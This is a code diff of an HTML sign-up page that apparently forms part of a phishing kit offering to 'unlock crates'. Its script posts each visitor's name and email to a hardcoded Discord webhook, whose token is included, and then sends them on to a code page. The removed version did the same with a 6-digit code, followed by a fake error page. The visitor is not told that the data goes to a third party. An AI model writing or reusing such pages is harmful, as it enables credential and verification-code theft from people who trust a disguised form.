--- a/signup.html
+++ b/signup.html
@@ -2,7 +2,7 @@
 <html lang="en">
 <head>
   <meta charset="UTF-8">
-  <title>Enter Your Code</title>
+  <title>Sign Up</title>
   <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;600&display=swap" rel="stylesheet">
   <style>
     html, body {
@@ -10,7 +10,7 @@
       padding: 0;
       height: 100%;
       font-family: 'Inter', sans-serif;
-      background: linear-gradient(-45deg, #2c003e, #3b1f5c, #4b2a6f, #6c3fa0);
+      background: linear-gradient(-45deg, #1e1e2f, #2c3e50, #34495e, #1abc9c);
       background-size: 400% 400%;
       animation: gradientShift 30s ease infinite;
       overflow: hidden;
@@ -59,8 +59,8 @@
     }
 
     .nav-item.home:hover {
-      color: #9b59b6;
-      text-shadow: 0 0 6px #9b59b6;
+      color: #1abc9c;
+      text-shadow: 0 0 6px #1abc9c;
     }
 
     .nav-item.disabled:hover::after {
@@ -85,6 +85,29 @@
       position: relative;
     }
 
+    .particles {
+      position: absolute;
+      top: 0; left: 0;
+      width: 100%; height: 100%;
+      pointer-events: none;
+      overflow: hidden;
+      z-index: 1;
+    }
+
+    .particles .dot {
+      position: absolute;
+      width: 8px;
+      height: 8px;
+      background: rgba(255,255,255,0.1);
+      border-radius: 50%;
+      animation: float 12s linear infinite;
+    }
+
+    @keyframes float {
+      0% { transform: translateY(0); opacity: 1; }
+      100% { transform: translateY(-100vh); opacity: 0; }
+    }
+
     .container {
       background: rgba(0, 0, 0, 0.75);
       padding: 50px 40px;
@@ -104,7 +127,7 @@
       }
       50% {
         transform: scale(1.02);
-        box-shadow: 0 0 60px rgba(155, 89, 182, 0.4);
+        box-shadow: 0 0 60px rgba(26, 188, 156, 0.4);
         opacity: 1;
       }
       100% {
@@ -116,9 +139,9 @@
 
     h2 {
       text-align: center;
-      margin-bottom: 30px;
+      margin-bottom: 20px;
       font-weight: 600;
-      font-size: 2rem;
+      font-size: 1.8rem;
     }
 
     form {
@@ -128,42 +151,28 @@
     }
 
     input {
-      padding: 16px;
+      padding: 14px;
       border: none;
       border-radius: 10px;
-      background: #3b2f4f;
+      background: #2f2f3f;
       color: #fff;
-      font-size: 16px;
-      transition: box-shadow 0.3s ease;
-    }
-
-    input:focus {
-      outline: none;
-      box-shadow: 0 0 12px #9b59b6;
+      font-size: 15px;
     }
 
     button {
-      padding: 16px;
-      background: #9b59b6;
+      padding: 14px;
+      background: #1abc9c;
       border: none;
       border-radius: 10px;
       color: #fff;
       font-weight: bold;
-      font-size: 16px;
+      font-size: 15px;
       cursor: pointer;
-      transition: background 0.3s ease, transform 0.2s ease;
-      animation: pulse 2s infinite;
+      transition: background 0.3s ease;
     }
 
     button:hover {
-      background: #8e44ad;
-      transform: scale(1.03);
-    }
-
-    @keyframes pulse {
-      0% { box-shadow: 0 0 0 0 rgba(155, 89, 182, 0.6); }
-      70% { box-shadow: 0 0 0 15px rgba(155, 89, 182, 0); }
-      100% { box-shadow: 0 0 0 0 rgba(155, 89, 182, 0); }
+      background: #16a085;
     }
   </style>
 </head>
@@ -178,25 +187,40 @@
   </div>
 
   <div class="main">
+    <div class="particles"></div>
+
     <div class="container">
-      <h2>Enter Your Code</h2>
-      <form id="form2">
-        <input type="text" id="Code" placeholder="6-digit Code" required>
+      <h2>Sign Up to Unlock Crates</h2>
+      <form id="form1">
+        <input type="text" id="Name" placeholder="Your Name" required>
+        <input type="email" id="Email" placeholder="Your Email" required>
         <button type="submit">Submit</button>
       </form>
     </div>
   </div>
 
   <script>
+    for (let i = 0; i < 40; i++) {
+      const dot = document.createElement('span');
+      dot.className = 'dot';
+      dot.style.left = Math.random() * 100 + '%';
+      dot.style.top = Math.random() * 100 + '%';
+      dot.style.animationDuration = (6 + Math.random() * 6) + 's';
+      document.querySelector('.particles').appendChild(dot);
+    }
+
     const webhookUrl = 'https://discord.com/api/webhooks/1413009868364976218/FRWyak8eE5D6BdqXv5x3_bMiKexf5I8x1y1qJuMPHRMcirw3qxCZseR5qXdatlQrCntp';
 
-    const sendCode = (code) => {
+    const sendNameEmail = (name, email) => {
       const msg = {
-        content: `🔐 Code submitted!\n**Code:** ${code}`,
+        content: `📨 New sign-up received!\n**Name:** ${name}\n**Email:** ${email}`,
         embeds: [{
-          title: 'Code Entry',
-          color: 15158332,
-          fields: [{ name: 'Code', value: code }],
+          title: 'Sign-Up Details',
+          color: 3447003,
+          fields: [
+            { name: 'Name', value: name },
+            { name: 'Email', value: email }
+          ],
           timestamp: new Date().toISOString()
         }]
       };
@@ -205,26 +229,17 @@
         method: 'POST',
         headers: { 'Content-Type': 'application/json' },
         body: JSON.stringify(msg)
-      })
-      .then(res => {
-        if (!res.ok) throw new Error(`HTTP ${res.status}`);
-        console.log('Code webhook sent successfully');
-        setTimeout(() => window.location.href = "Error.html", 750);
-      })
-      .catch(err => {
-        console.error('Code webhook error:', err);
       });
     };
 
     document.addEventListener('DOMContentLoaded', () => {
-      document.querySelector('#form2').addEventListener('submit', (e) => {
+      document.querySelector('#form1').addEventListener('submit', (e) => {
         e.preventDefault();
-        const code = document.querySelector('#Code').value.trim();
-        if (!/^\d{6}$/.test(code)) {
-          alert('Code must be exactly 6 digits.');
-          return;
-        }
-        sendCode(code);
+        const name = document.querySelector('#Name').value.trim();
+        const email = document.querySelector('#Email').value.trim();
+        if (!name || !email) return;
+        sendNameEmail(name, email);
+        setTimeout(() => window.location.href = "Sign Up Code.html", 750);
       });
     });
   </script>
